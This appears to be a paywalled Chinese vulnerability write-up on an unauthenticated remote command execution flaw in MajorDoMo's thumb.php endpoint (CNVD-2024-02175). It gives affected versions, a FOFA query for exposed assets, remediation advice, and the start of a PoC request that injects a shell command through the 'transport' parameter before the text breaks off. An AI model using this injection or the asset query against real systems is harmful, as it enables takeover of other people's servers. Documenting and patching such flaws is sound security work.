超级会员免费看
本文详细介绍了MajorDoMo智能家居平台的thumb.php接口存在的远程命令执行漏洞,该漏洞允许未经认证的攻击者执行任意指令,影响版本为MajorDoMo<0662e5e。复现环境中发现948个受影响资产。修复建议包括限制接口访问权限或升级到安全版本。
产品简介
MajorDoMo是MajorDoMo社区的一个开源DIY 智能家居Q自动化平台。
漏洞概述
MajorDoMo /modules/thumb/thumb.php接口处存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行任意指令,获取服务器权限。
影响范围
MajorDoMo< 0662e5e
漏洞编号与纰漏时间
CVE编号:未知
CNNVD编号:未知
CNVD编号:CNVD-2024-02175
复现环境
fofa
app="MajordomoSL"
资产数:948
漏洞复现
Poc
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
